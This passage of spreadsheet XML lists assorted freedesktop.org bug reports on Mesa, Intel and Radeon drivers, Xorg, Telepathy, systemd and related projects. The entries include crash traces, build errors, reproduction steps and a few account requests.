Reproducable with bfgminer or the tests from http://cgit.freedesktop.org/~tstellar/opencl-example/ with mesa 10.0.1 as well as 10.1 (git-646c16a).</t>
  </si>
  <si>
    <t>v10lator</t>
  </si>
  <si>
    <t>GTK-QT_ENGINE-2414</t>
  </si>
  <si>
    <t>Eclipse 3.1M4 eats up all memory using GTK-QT engine</t>
  </si>
  <si>
    <t>I am having some serious problems using Eclipse. After a lot of testing I
managed to pinpoint the gtk-qt engine as the source of the problem. The
following issue does not arise if I disable the GTK-Qt engine and use something
else. I put Eclipse in debug mode and looked at the logs but it never threw any
exceptions.
Steps to reproduce the problem:
1. Switch Workspace &gt; ... Create a new workspace
2. New &gt; Project &gt; Java Project &gt; ... Finish
3. Window &gt; Preferences
4. Expand the Java tree node
5. Highlight the Editor node no need to expand it 
6. Memory usage increases by 50mb per second.
Behaviours after this has happened:
- If the Preferences window is closed (cancel) then no more memory is lost.
However the memory is never recovered even if Eclipse is closed or the user
has logged out.
- It is possible to select (highlight) other entries on the tree of preferences
however the page on the right hand side corresponding to the selected preference
does not appear. For example selecting General no longer does anything in the
right-hand pane.
My set up:
- Intel P4
- Debian Testing/Sid
- Eclipse 3.1M4
- GTK-Qt Engine v0.60 from Kalyxo
- Sun Java2 v1.5.0
- KDE v3.3.1
||/ Name                  Version               Description
+++-=====================-=====================-==========================================================
ii  gtk2-engines-gtk-qt   0.60-1                theme engine using Qt for GTK+ 2.x
ii  libgtk2.0-0           2.4.14-2              The GTK+ graphical user
interface library
ii  libgtk2.0-bin         2.4.14-2              The programs for the GTK+
graphical user interface library
ii  libgtk2.0-common      2.4.14-2              Common files for the GTK+
graphical user interface library
ii  kdebase               3.3.1-4               KDE Base metapackage</t>
  </si>
  <si>
    <t>infodroid</t>
  </si>
  <si>
    <t>MESA-59538</t>
  </si>
  <si>
    <t>Crusader Kings from Steam Linux fails to render map</t>
  </si>
  <si>
    <t>The game menus and portraits render ok but the map screen just shows up as black.  Moving the mouse across it renders a gray rectangle whose lower left corner is under the mouse cursor and which extends up to the top of the screen and to the right edge of the screen.  Haven't dug in any further I assume this is a driver bug.
I'm using Mesa 9.1 as of git 20130104.r1.b8b1d61e (one of the Ubuntu edgers snapshots).</t>
  </si>
  <si>
    <t>MESA-18754</t>
  </si>
  <si>
    <t>[clutter] Querying the GLX_BIND_TO_MIPMAP_TEXTURE_EXT attribute returns -1 for all fbconfigs</t>
  </si>
  <si>
    <t>Created attachment 20665
glxinfo that queries the GLX_BIND_TO_MIPMAP_TEXTURE_EXT fbconfig attribute
In Clutter we are querying the GLX_BIND_TO_MIPMAP_TEXTURE_EXT fbconfig attribute to determine if we can using mipmapping + texture from pixmap. It seems with my Intel i965 driver this returns -1 for all fbconfigs. As I understand it this should be a boolean value and if I query the attribute with other drivers I get back either 0 or 1 for all fbconfigs.
Attached is a modified glxinfo that prints the value of the GLX_BIND_TO_MIPMAP_TEXTURE_EXT for all fbconfigs.</t>
  </si>
  <si>
    <t>DRI-73383</t>
  </si>
  <si>
    <t>[IVB/HSW ppgtt bisected] When run nightly piglit testing causes X no responsive</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Platform:       Ivybridge/Haswell
Libdrm:		(master)libdrm-2.4.50-5-ge8cbc579651ef55274763c67acb366dd4155e0ce
Mesa:		(master)a61ae2aa01c9b1976ba4107c1564e0c3f94aea4d
Xserver:	(master)xorg-server-1.15.0
Xf86_video_intel:(master)2.99.907-1-g4d8f78bc95f8dd36693f74365dbc3c442fbbf8a9
Cairo:		(master)2afc941d7ffad3bd37a915e82342640772d4df5b
Libva:		(staging)c02f36ba4eb0ab8da46a06419106eafceded6cb9
Libva_intel_driver:(staging)e2e4898bd60aed48b260a4bc380959d9ae2ec1d9
Kernel:	(drm-intel-nightly) 164a4cb4c1431a0689f85507868356fae24da638
Bug detailed description:
-----------------------------
When run nightly Piglit testing on Ivybridge and Haswell It causes X no responsive. It's not replicable manually.
It happens on -nightly branch works well on -fixes branch.
The latest known good commit: 02905525c3310ba673676f8041d0ff6be4da0e24
The latest known bad commit: 2c21a51be4b73fbde9d8dd330195fbb15dd4ed4b
dmesg:
[  275.573184] BUG: unable to handle kernel NULL pointer dereference at 0000000000000008
[  275.573226] IP: [] i915_gem_gtt_finish_object+0x73/0xc8 [i915]
[  275.573272] PGD b410e067 PUD c7525067 PMD 0
[  275.573295] Oops: 0000 [#1] SMP
[  275.573313] Modules linked in: bnep bluetooth rfkill ip6table_filter ip6_tables ebtable_nat ebtables nf_conntrack_ipv4 nf_defrag_ipv4 xt_conntrack nf_conntrack ipt_REJECT iptable_mangle xt_tcpudp iptable_filter ip_tables x_tables bridge stp llc ipv6 dm_mod dcdbas snd_hda_codec_hdmi iTCO_wdt iTCO_vendor_support snd_hda_codec_realtek serio_raw pcspkr snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_page_alloc lpc_ich i2c_i801 mfd_core snd_timer snd soundcore acpi_cpufreq i915 video button drm_kms_helper drm
[  275.573563] CPU: 2 PID: 4309 Comm: arb_color_buffe Not tainted 3.13.0-rc4_drm-intel-nightly_2c21a5_20140106_debug+ #100
[  275.573607] Hardware name: Dell Inc. OptiPlex 9010/03JR84 BIOS A01 05/04/2012
[  275.573638] task: ffff8800c6c93fa0 ti: ffff8800b7568000 task.ti: ffff8800b7568000
[  275.573669] RIP: 0010:[]  [] i915_gem_gtt_finish_object+0x73/0xc8 [i915]
[  275.573718] RSP: 0018:ffff8800b7569d18  EFLAGS: 00010246
[  275.573740] RAX: 0000000000000000 RBX: ffff880003740000 RCX: ffff8800befe5000
[  275.573770] RDX: 0000000000000011 RSI: 0000000000000011 RDI: ffff8801156101c0
[  275.573800] RBP: ffff8800b7569d38 R08: 0000160000000000 R09: ffff880000000000
[  275.573830] R10: 0000000000000010 R11: ffff8801156101c0 R12: ffff8801156101c0
[  275.573860] R13: 0000000000000001 R14: ffff880118545000 R15: ffff880003740000
[  275.573890] FS:  00007f7e0cb30740(0000) GS:ffff88011e300000(0000) knlGS:0000000000000000
[  275.573923] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  275.573948] CR2: 0000000000000008 CR3: 00000000b7443000 CR4: 00000000001407e0
[  275.573977] Stack:
[  275.573987]  ffff8801156101c0 ffff880003348d80 0000000000000000 ffff8801189e3268
[  275.574023]  ffff8800b7569d78 ffffffffa0082d37 ffff8800d4880898 ffff8800d4880898
[  275.574058]  ffff8800d48808f0 ffff880118545000 ffff8801189e3268 ffff8800b746f690
[  275.574094] Call Trace:
[  275.574114]  [] i915_vma_unbind+0xc3/0x180 [i915]
[  275.574147]  [] i915_gem_evict_vm+0x88/0xd2 [i915]
[  275.574180]  [] i915_gem_context_free+0xd7/0x134 [i915]
[  275.574215]  [] i915_gem_context_close+0x84/0x8b [i915]
[  275.574248]  [] i915_driver_preclose+0x2e/0x49 [i915]
[  275.574281]  [] ? i915_driver_lastclose+0x40/0x40 [i915]
[  275.574316]  [] drm_release+0x77/0x4c4 [drm]
[  275.574343]  [] __fput+0xed/0x1e3
[  275.574365]  [] ____fput+0xe/0x10
[  275.574388]  [] task_work_run+0x7e/0x96
[  275.574412]  [] do_notify_resume+0x5a/0x6b
[  275.574439]  [] ? trace_hardirqs_on_thunk+0x3a/0x3f
[  275.574467]  [] int_signal+0x12/0x17
[  275.574489] Code: 48 c7 c6 39 fa 0e a0 31 c0 e8 ef b8 f7 ff bf c6 a7 00 00 e8 0b ae 2e e1 41 f6 84 24 3b 01 00 00 01 75 44 49 8b 84 24 40 01 00 00  50 08 48 8b 30 49 8b 86 90 03 00 00 48 89 c7 48 81 c7 98 00
[  275.574651] RIP  [] i915_gem_gtt_finish_object+0x73/0xc8 [i915]
[  275.574689]  RSP 
[  275.574704] CR2: 0000000000000008
[  275.578714] ---[ end trace 34d8cec1bb111f7b ]---
Reproduce steps:
-------------------------
Run all piglit cases</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-19850</t>
  </si>
  <si>
    <t>New account request for libVA project maintenance (http://cgit.freedesktop.org/libva/)</t>
  </si>
  <si>
    <t>Created attachment 22409
GPG public key
Hi 
I am working on libVA video driver and library development and would like to apply an account to maintain libva project on http://cgit.freedesktop.org/libva/. My information is:
Name: Yuan Shengquan
Email: shengquan.yuan@intel.com
Prefered Account: AustinYuan
I attached my GPU and SSH public key here.
Thanks
Austin</t>
  </si>
  <si>
    <t>MESA-109818</t>
  </si>
  <si>
    <t>wrong color rendering in SOULCALIBUR 6 using dxvk</t>
  </si>
  <si>
    <t>When running SOULCALIBUR 6 in steam using dxvk and mesa 19.0 rc6 the 3D elements (characters world) are rendered with the wrong colors.
Switching to 19.0rc5 will fix this.
Software:
Mesa 19.0rc6
LLVM 7.0.1
Proton 3.16-7Beta with DXVK 0.94(Default)
Kernel 4.20.8</t>
  </si>
  <si>
    <t>DRI-33272</t>
  </si>
  <si>
    <t>Kernel DRM/Radeon KMS BSOD on HD6850-NI</t>
  </si>
  <si>
    <t>Using 2.6.38-rc1 vanilla
When I try to load radeon kernel module with
modprobe radeon modeset=1
I got BSOD computer doesn't give any response to me. CTRL+ALT+DEL don't working nor my main computer switch. 
modprobe radeon modeset=0
doesn't make such problem and computer looks working. But my Northern Islands (HD6850) card doesn't support Gallium3D without KMS.
Thanks.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-12870</t>
  </si>
  <si>
    <t>Account request for Will Thompson</t>
  </si>
  <si>
    <t>Please could I have a freedesktop.org account?
Real name: Will Thompson
Email address: will.thompson@collabora.co.uk
Preferred account name: wjt</t>
  </si>
  <si>
    <t>MESA-21691</t>
  </si>
  <si>
    <t>i945 cubemap texture layout code is buggy</t>
  </si>
  <si>
    <t>Created attachment 25752
Patch that fixes the issue
The i945 cubemap layout code is buggy for the lower mip levels it puts the 4x4 and 2x2 mipmaps on top of each other due to a missing break and the 2x2 mipmap levels are in the wrong order (+X -X +Y -Y +Z -Z instead of +X +Y +Z -X -Y -Z). The attached patch fixes both issues. It also fixes an inconsistency in the comment -- both the code the figure and the rest of the comment assumes 8x8 alignment not 4x4 as the comment says.
I've attached a small conformance test that makes a 64x64 cubemap and draws all faces and mip levels (with reference colors on the left textured rendering on the right). reference-cubemap.png is how it's rendered on all ATI and nVidia cards I've been able to find. i945-cubemap-pre-fix.png is how it looks in Mesa 7.4.1 i945-cubemap-post-fix.png is how it looks after the attached patch.
As you can see it's still not right on my i945 but that's a separate bug (filing shortly).</t>
  </si>
  <si>
    <t>sgunderson</t>
  </si>
  <si>
    <t>TELEPATHY-11818</t>
  </si>
  <si>
    <t>stream-engine</t>
  </si>
  <si>
    <t>Fix s-e interaction with pic2plot</t>
  </si>
  <si>
    <t>Stream Engine's build process tries to draw sequence diagrams using pic2plot but that doesn't work for some reason. This causes build problems on systems that *do* have pic2plot installed (typically Red Hat-based).</t>
  </si>
  <si>
    <t>TELEPATHY-18756</t>
  </si>
  <si>
    <t>Can't join existing clique room in tests because of the timer</t>
  </si>
  <si>
    <t>With current test framework it's impossible to join an existing muc and wait to have joined it because Clique takes 30 seconds to do that causing a timeout in the test.
Possible workarounds / fixes includes:
a) Add a timeout argument to q.expect
b) Add a time.sleep(28) before the q.expect
c) Patch gibber code to be able to pass it a shorter timer using an env variable
d) Run tests with telepathy-salut-debug which has been tweaked to use a shorter timer. That needs some test-only API in Gibber.
a) and b) are easy but increase test run time. b) is pretty horrible but seems to work.</t>
  </si>
  <si>
    <t>POPPLER-45442</t>
  </si>
  <si>
    <t>Remove unused variable in CairoFontEngine.cc</t>
  </si>
  <si>
    <t>Created attachment 56385
0001-Remove-unused-variable-in-CairoFontEngine.cc.patch
There is an unused variable in CairoFontEngine.cc.
Patch attached.</t>
  </si>
  <si>
    <t>CAIRO-31604</t>
  </si>
  <si>
    <t>CAIRO_FORMAT_A1 broken for many routines in the image backend</t>
  </si>
  <si>
    <t>CAIRO_OPERATOR_CLEAR is broken due the lack of a PIXMAN_A1 implementation of pixman_fill. The same for drawing a black rectangle. Also drawing a polygon is broken. This was posted on the mailinglist with a test case.</t>
  </si>
  <si>
    <t>DRI-49220</t>
  </si>
  <si>
    <t>[ilk] Screen jitters at 1920x1080p</t>
  </si>
  <si>
    <t>I have a Dell Latitude E5510 with an intel GPU which works absolutely fine until I plug in an extra monitor or projector. I have a lot of hardware to work with and up until precise about 40% of the hardware was displaying fine.
One monitor I'm working with (LG E2340T-PN) used to work with oneiric on full HD just fine. no problems at all!
After the (clean) installation of precise I suddenly have to use the 1680x1050 resolution. switching to 1080p just thrashes X.
The monitor I use at home is a Dell 20 (1680x1050 native). I have to switch to 1280x1024 to make my monitor work. If I don't my screen flickers and jitters and tries to sync (constantly).
The projector I use at home is a SONY VPL-CX76 (1400x1050). no problems with it at all! a Dell projector at work simply doesn't work at all (getting no signal). We have a couple high end sony projectors as well (1080p monsters) that give me the same jittering as on my monitor at home.
Right now I'm working on the 23 LG (1080p native but running on 1680x1050 now)
my xrandr output:
VGA1 connected 1680x1050+0+0 (normal left inverted right x axis y axis) 510mm x 290mm
1920x1080      60.0 +
1680x1050      60.0* 
1280x1024      75.0     60.0  
1280x960       60.0  
1152x864       75.0  
1024x768       75.1     60.0  
832x624        74.6  
800x600        75.0     60.3     56.2  
640x480        75.0     60.0  
720x400        70.1  
j0lle@j0lle-laptop:~$ lsmod | grep i915
i915                  468651  3 
drm_kms_helper         46978  1 i915
drm                   242038  4 i915drm_kms_helper
i2c_algo_bit           13423  1 i915
video                  19596  1 i915
j0lle@j0lle-laptop:~$ dpkg -l xserver-xorg-video-intel
xserver-xorg-video-intel              2:2.17.0-1ubuntu4                     
I've been looking FOR MONTHS and I can't find a case like mine... Some are quite similar but never the same. I tried different kernels different drivers (xorg-edgers) some patches nothing worked so far.
Similar (recent) cases
https://bugs.freedesktop.org/show_bug.cgi?id=36515
https://bugs.freedesktop.org/show_bug.cgi?id=48518
I'm now running a custom 3.3 kernel as suggested here: https://bugs.freedesktop.org/show_bug.cgi?id=36515#c36
But it did not resolve my issue.
There are countless others with some distortion problems but I've never found a bug that described my issue.</t>
  </si>
  <si>
    <t>smedtsjelle</t>
  </si>
  <si>
    <t>SYSTEMD-64973</t>
  </si>
  <si>
    <t>localectl should verify all keymap parameters more accurately (for example not allow newlines)</t>
  </si>
  <si>
    <t>localectl not return errors if executed command have errors in [options]
For example next command not returned errors
=================
localectl set-x11-keymap ruus pc104 cyrillic grp:ctrl_shift_toggle terminate:ctrl_alt_bksp
=================
But there error! Must be:
================
localectl set-x11-keymap ruus pc104 cyrillic grp:ctrl_shift_toggleterminate:ctrl_alt_bksp
================
Alexandre Minoshi</t>
  </si>
  <si>
    <t>minoshi</t>
  </si>
  <si>
    <t>DBUS-41423</t>
  </si>
  <si>
    <t>MemoryBarrier not available on mingw (from mingw.org) and people keep working around it</t>
  </si>
  <si>
    <t>I build dbus-src on windows and got the follow error message:
=======================================================
[ 41%] Building C object dbus/CMakeFiles/dbus-1.dir/C_/Mat/kderoot/git/dbus-src-git/dbus/dbus-sysdeps-util-win.obj
Linking C shared library ..\bin\libdbus-1.dll
Creating library file: ..\bin\libdbus-1.dll.a
CMakeFiles\dbus-1.dir/objects.a(dbus-sysdeps-win.obj): In function `dbus_atomic_get':
C:/Mat/kderoot/git/dbus-src-git/dbus/dbus-sysdeps-win.c:3081: undefined reference to `MemoryBarrier'
collect2: ld returned 1 exit status
mingw32-make[2]: *** [bin/libdbus-1.dll] Error 1
mingw32-make[1]: *** [dbus/CMakeFiles/dbus-1.dir/all] Error 2
mingw32-make: *** [all] Error 2
emerge fatal error: while running make cmd: mingw32-make
emerge fatal error: running python C:\Mat\kderoot\etc\..\emerge\portage\win32lib
s-sources\dbus-src\dbus-src-1.4.10-20110302.py compile
emerge debug: Task: Emerge stopped after: 0:01:44.040000
=======================================================
My platform is:
32bit / windows7
ming4 4.4.0 
dbus git version =&gt; 7973504
I found a related post and seems had a patch for this:
http://lists.gnu.org/archive/html/mingw-cross-env-list/2011-09/msg00033.html</t>
  </si>
  <si>
    <t>matlinuxer2</t>
  </si>
  <si>
    <t>MESA-96221</t>
  </si>
  <si>
    <t>nir/nir_lower_tex.c:202: error: unknown field â€˜f32â€™ specified in initializer</t>
  </si>
  <si>
    <t xml:space="preserve">mesa: 5b2675093e863a52b610f112884ae12d42513770 (master 11.3.0-devel)
$ gcc --version
gcc (GCC) 4.4.7 20120313 (Red Hat 4.4.7-17)
Copyright (C) 2010 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
  CC     nir/nir_libnir_la-nir_lower_tex.lo
nir/nir_lower_tex.c: In function â€˜convert_yuv_to_rgbâ€™:
nir/nir_lower_tex.c:202: error: unknown field â€˜f32â€™ specified in initializer
nir/nir_lower_tex.c:202: warning: missing braces around initializer
nir/nir_lower_tex.c:202: warning: (near initialization for â€˜m[0]..f32â€™)
nir/nir_lower_tex.c:203: error: unknown field â€˜f32â€™ specified in initializer
nir/nir_lower_tex.c:204: error: unknown field â€˜f32â€™ specified in initializer
commit a41b57679fd659dda1b6df3286b34c13cac7811a
Author: Kristian HÃ¸gsberg Kristensen 
Date:   Sun May 1 21:13:37 2016 -0700
    nir: Add a lowering pass for YUV textures
    This lowers sampling from YUV textures to 1) one or more texture
    instructions to sample each plane and 2) color space conversion to RGB.
    Reviewed-by: Jordan Justen 
    Reviewed-by: Jason Ekstrand </t>
  </si>
  <si>
    <t>MESA-107892</t>
  </si>
  <si>
    <t>[Debug mesa only]. crash happens when blit framebuffer</t>
  </si>
  <si>
    <t>Steps:
1. Download chrome and open the link https://www.khronos.org/registry/webgl/sdk/tests/conformance2/rendering/blitframebuffer-size-overflow.html?webglVersion=2&amp;quiet=0
2.Crash happens.
Notes:
I am not sure that the issue is a mesa bug or case bug but mesa throws the ASSERT. If it is a case bug please give some information why it crashes thank you.</t>
  </si>
  <si>
    <t>PYCAIRO-50989</t>
  </si>
  <si>
    <t>cairo.SVGSurface(sys.stdout foo bar) doesn't work with python3</t>
  </si>
  <si>
    <t>If you open a svgsurface with sys.stdout 
when you call .finish() then you get
 TypeError: must be str not bytes
The docs says fobj (None str file or file-like object) â€“ a filename or writable file object. None may be used to specify no output. 
which sys.stdout is</t>
  </si>
  <si>
    <t>shawn</t>
  </si>
  <si>
    <t>TELEPATHY-78377</t>
  </si>
  <si>
    <t>[next] move TpBaseConnectionPrivate back to the .c</t>
  </si>
  <si>
    <t>Xavier on Bug #77189:
&gt; Note
&gt; that the TpBaseConnectionPrivate struct can move back to the .c instead of
&gt; -internal.h now if you want.
to which I replied:
&gt; I would like to move the private struct back to the .c at some point
&gt; but it isn't critical-path.</t>
  </si>
  <si>
    <t>XORG-23833</t>
  </si>
  <si>
    <t>[i945G KMS] X uses different refresh rate to that set by kernel module</t>
  </si>
  <si>
    <t>Created attachment 29370
dmesg
[This problem was already reported in https://bugs.freedesktop.org/show_bug.cgi?id=22716#c38]
I am using drm-next linux up to c746e205f2fb6f74b4a622382607f065eca5eb49. I noticed that when X starts it uses a different mode (same resolution but different refresh rate) of that set by the kernel module during boot. This also make X  VT switching slow as without KMS.
This is what I see using my monitor OSD:
X: 1280x1024 Hf:63KHz Vf:59.9Hz
boot and VT: 1280x1024 Hf:79KHz Vf:74.6Hz
I'll attaching dmesg and Xorg.0.log.</t>
  </si>
  <si>
    <t>MESA-50484</t>
  </si>
  <si>
    <t>Mesa build fails if no `indent` available</t>
  </si>
  <si>
    <t xml:space="preserve">There is no `indent` installed in my system and mesa build fails with:
python -t -O -O glX_proto_send.py -m proto | indent -i4 -nut -br -brs -npcs -ce -T GLubyte -T GLbyte -T Bool &gt; ../../../../src/glx/indirect.c
/bin/sh: indent: command not found
Traceback (most recent call last):
  File glX_proto_send.py line 1097 in 
    printer.Print( api )
  File /sources/mesa/src/mapi/glapi/gen/gl_XML.py line 121 in Print
    self.printHeader()
  File /sources/mesa/src/mapi/glapi/gen/gl_XML.py line 141 in printHeader
    self.printRealHeader()
  File glX_proto_send.py line 308 in printRealHeader
IOError: [Errno 32] Broken pipe
make[2]: *** [../../../../src/glx/indirect.c] Error 127
make[2]: Leaving directory `/sources/mesa/src/mapi/glapi/gen'
since:
0ce0f7c0c8fa9902678af7f3ecad2541be5808d2 is the first bad commit
commit 0ce0f7c0c8fa9902678af7f3ecad2541be5808d2
Author: Eric Anholt 
Date:   Tue May 15 13:06:22 2012 -0700
    mesa: Remove the generated glapi from source control and just build it.
    Mesa already always depends on python to build.  The checked in
    changes are not reviewed (because any trivial change rewrites the
    world).  We also have been pushing commits between xml change and
    regen where at-build-time xml-generated code disagrees with committed
    xml-generated code.  And worst of all sometimes we (I) check in
    *stale* xml-generated code.
    Acked-by: Ian Romanick </t>
  </si>
  <si>
    <t>WAYLAND-101099</t>
  </si>
  <si>
    <t>Make sure LID_SWITCH_RELIABILITY=write_open is useful</t>
  </si>
  <si>
    <t>See the 3 top commits of https://github.com/bentiss/libinput
We were not able to trigger the required conditions to have the switch overwritten by libinput.
I haven't finished writing the tests but:
- an assert is raised with the current code when
  * a keyboard gets paired with the lid switch
  * the lid switch node report closed while it is physically opened
  * a key gets pressed on the paired keyboard which opens the lid switch
  * the keyboard gets unplugged (on the Surface 3 closing the cover removes the attached USB devices)
- we can't start observing keyboard events is the state is reported as opened by evdev-lid.c
- we need to start listening to the events when pairing the keyboard if the reported state is closed</t>
  </si>
  <si>
    <t>MESA-26966</t>
  </si>
  <si>
    <t>Blender 2.50 alpha1 crash with intel_regions.c:195 error</t>
  </si>
  <si>
    <t>Created attachment 33871
Xorg log
When trying to start blender-2.50-alpha1-linux-glibc27-i686 Blender crashes and I get this error message:
blender: intel_regions.c:195: intel_region_alloc: Assertion `aligned_pitch == pitch * cpp' failed.
OS: Ubuntu 9.10 32bit
Kernel: 2.6.33-020633-generic (Vanilla kernel)
Xorg: 7.4
Mesa: 7.8.0~git20100304.4c0c728b
libdrm: 2.4.19+git20100307.04fd3872
intel driver: 2.10.901+git20100305.1cd55642
I believe this bug was introduced in the last 3-4 days so it would be easier to locate!</t>
  </si>
  <si>
    <t>DRI-97027</t>
  </si>
  <si>
    <t>[APL] [drm:intel_pipe_update_end [i915]] *ERROR* Potential atomic update failure on pipe</t>
  </si>
  <si>
    <t>This to follow-up on 2nd issues linked to bug 96701</t>
  </si>
  <si>
    <t>yann.argotti</t>
  </si>
  <si>
    <t>LIBREOFFICE-36982</t>
  </si>
  <si>
    <t>[FILEOPEN] Writer ignores text after Equation in docx</t>
  </si>
  <si>
    <t>When loading a docx file Writer will not load an Equation created in MS Word and any text after it.
This is a regression. This didn't happen in LO 3.3.2. In Writer 3.3.2 the document is fully loaded and the Equation is displayed and opened in MS Equation Editor for editing.
Just for the record it didn't happen in OOo Writer 3.3 either. But OOo 3.4 Beta loads the whole text and just ignores the Equation.</t>
  </si>
  <si>
    <t>SWFDEC-15958</t>
  </si>
  <si>
    <t>Save media as button does nothing by default</t>
  </si>
  <si>
    <t>swfdec-mozilla 0.6.0-2ubuntu1 Ubuntu 8.04
1. Go to a Web page containing a Flash object.
2. Right-click on the object and choose Properties.
3. In the properties window click Save media as.
What should happen: A filepicker appears.
What actually happens: Nothing.
I think two things should be changed here:
(a) the first item in the list should be selected by default
(b) either the Save media as button should be insensitive when no item is selected or it should be impossible to not have an item selected.</t>
  </si>
  <si>
    <t>mpt</t>
  </si>
  <si>
    <t>XORG-3048</t>
  </si>
  <si>
    <t>External monitor inoperable on GeForce4 MX with AGP8X (Mac)</t>
  </si>
  <si>
    <t>I am trying to get a sensible signal onto the external VGA connector of an iMac
G5 (PCI id of video chip 10de:0189 the name above is taken from nv_driver.c). 
I'm running a self-built x.org 6.8.2 (2005-2-9). 
Although a quick look into the nv sources seems to indicate that there is at
least some support for head selection (or even multi-headed operation?) I did
not succeed.
Here is what I tried:
(a) Plain Driver nv: No signal the external  connector
(b) Option CrtcNumber 1 in Device section: No valid modes found.  The log
says (among other things):
(II) NV(0): I2C device DDC:ddc2 removed.
(**) NV(0): Forcing CRTCNumber 1 as specified
(II) NV(0): Using DFP on CRTC 1
(--) NV(0): Panel size is 1 x 1
xorg then of course removes all video modes
(c) additionally
	Option FlatPanel false
in Device Section and an External Screen reference in ServerLayout where
Section Monitor
	Identifier	External VGA
	HorizSync	28-130
	VertRefresh	43-90
EndSection
and
Section Screen
	Identifier	External Screen
	Device		Nvidia G5
	Monitor		External VGA
[Modes definition]
EndSection
Some signal on the external VGA port DCC runs and identifies the device
attached (in my case a beamer).  xorg correctly finds some modes and chooses
the default one (1280x1024).  The beamer senses 1280x1024 too but does not
display anything (or rather black).  However the built-in panel now displays
funky patterns -- always the same ones so I assume it's gdm's login screen at
horribly wrong depth and resolution.  On terminating the server the beamer
senses a loss of video signal.
Phenomena analogous to (c) occur when I try a ServerLayout with two screens.
Ideally I'd like to mirror the LCD on the external monitor.  Any chance this
will ever work (unless nvidia cooperates)?
I'd be willing to help fix this but I'd highly appreciate pointers to
documentation in whatever form.</t>
  </si>
  <si>
    <t>msdemlei</t>
  </si>
  <si>
    <t>XORG-36860</t>
  </si>
  <si>
    <t>X crashes when I set a Python Tkinter edit control to display a long text string in 25pt DejaVu font</t>
  </si>
  <si>
    <t>Forwarding this bug from Ubuntu reporter Silas S. Brown:
http://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/731424
[Problem]
The Tk script shown below reliably crashes the xserver in Ubuntu.  This is due to dereferencing a null privates pointer in i965_set_picture_surface_state()
[Original Description]
I am on Ubuntu 10.10 with the default X server and the following Python code crashes it every time:
from Tkinter import *
f=Frame()
f.option_add('*font' -family {DejaVu Sans} -size -25 -weight normal -slant roman -underline 0 -overstrike 0)
f.pack()
text = StringVar(f)
entry = Entry(f textvariable=text)
entry.pack()
text.set(a * 600)  # 537 is ok values 538 and up crash X
f.mainloop()
Unfortunately I was not able to capture a backtrace with apport.  I'm using an Asus X58Lseries laptop which I believe is 1280 x 800 (WXGA) using an Intel GMA X3100 graphics chipset.  I have set System &gt; Preferences &gt; Appearance &gt; Fonts &gt; Details &gt; Resolution to 160 DPI for a larger display.
#0  i965_set_picture_surface_state (intel=0x883dcd0 pixmap=0xb7103008 is_dst=1 
    picture=) at ../../src/i965_render.c:1136
        priv = 0x0
        ss = 
        write_domain = 
        read_domains = 
        offset = 
#1  0x0020fa2a in i965_bind_surfaces (dest=0xb7103008 srcX=320 srcY=48 maskX=0 maskY=0 dstX=0 
    dstY=0 w=15 h=14) at ../../src/i965_render.c:1740
        binding_table = 0x8845f24
#2  i965_composite (dest=0xb7103008 srcX=320 srcY=48 maskX=0 maskY=0 dstX=0 dstY=0 w=15 h=14)
    at ../../src/i965_render.c:1845
        scrn = 0x8839040
        intel = 0x883dcd0
        render_state = 
        has_mask = 0
        src_x = {320 320 335}
        src_y = {48 62 62}
        src_w = {8.8028834e-33 8.80539896e-33 5.77529779e-33}
        mask_x = {0 1.875 4.48415509e-43}
        mask_y = {5.73971851e-42 8.74344453e-33 1.29830863e-39}
        mask_w = {-1.50051022 3.02446732e-39 0}
        is_affine = 1
#3  0x002197a0 in uxa_glyphs_via_mask (op=3 '\003' pSrc=0xa3398f8 pDst=0xa36e470 
    maskFormat=0x9efdd88 xSrc=0 ySrc=0 nlist=3 list=0xbfc017e0 glyphs=0xa36f260)
    at ../../uxa/uxa-glyphs.c:1002
        this_atlas = 0x9f2e8e8
        src_x = 320
        glyph = 0xa326798
        src_y = 48
        priv = 0x9efe490
        screen = 0x8831588
        mask = 0xa3597c0
        y = 14
        pixmap = 0xb7103008
        dst_off_x = 196611
        n = 
        dst_off_y = 13
        box = {x1 = 3 y1 = 13 x2 = 9003 y2 = 27}
        component_alpha = 1
        glyph_atlas = 0x9f2e8e8
        x = 0
        height = 
        error = 0
#4  uxa_glyphs (op=3 '\003' pSrc=0xa3398f8 pDst=0xa36e470 maskFormat=0x9efdd88 xSrc=0 ySrc=0 
    nlist=3 list=0xbfc017e0 glyphs=0xa36f260) at ../../uxa/uxa-glyphs.c:1157
...</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-108745</t>
  </si>
  <si>
    <t>Update SSh keys for drm-firmware account</t>
  </si>
  <si>
    <t>Created attachment 142466
public ssh key
I'd like to replace my ssh key with the attached key.</t>
  </si>
  <si>
    <t>SPECIFICATIONS-77193</t>
  </si>
  <si>
    <t>Typo in variable name: should be XDG_CURRENT_DESKTOP not XDG_CURRENT_DIRECTORY</t>
  </si>
  <si>
    <t>Created attachment 97087
desktop-entry-spec: Fix variable name
I think Ryan Lortie made a typo here. A patch is attached.</t>
  </si>
  <si>
    <t>mitya57</t>
  </si>
  <si>
    <t>MESA-52168</t>
  </si>
  <si>
    <t>lp_test_blend regression</t>
  </si>
  <si>
    <t>8684ffc141ed024ab1d42fcba31d8517288fac40 is the first bad commit
commit 8684ffc141ed024ab1d42fcba31d8517288fac40
Author: James Benton 
Date:   Tue Jul 3 17:01:14 2012 +0100
    llvmpipe: Unified common code between AoS and SoA blending.
    Added a new file lp_bld_blend.c for the common code.
    Merged and added some simple optimisations.
    Reviewed-by: Jose Fonseca 
:040000 040000 ac10b3ec590c62719567ecb59b1388ef5ac86dd0 e352e69f9f14be9337943e81923a07a4ae7d897b M	src
bisect run success</t>
  </si>
  <si>
    <t>MESA-37476</t>
  </si>
  <si>
    <t>[wine] Devil May Cry 4: TXD tgsi opcode unsupported / translation from TGSI failed / missing vertex shader</t>
  </si>
  <si>
    <t>The demo of the game Devil May Cry 4 (running in Wine) isn't rendering correctly quite a few objects are missing. The following errors are printed on the terminal:
 EE r600_shader.c:829 tgsi_unsupported - TXD tgsi opcode unsupported
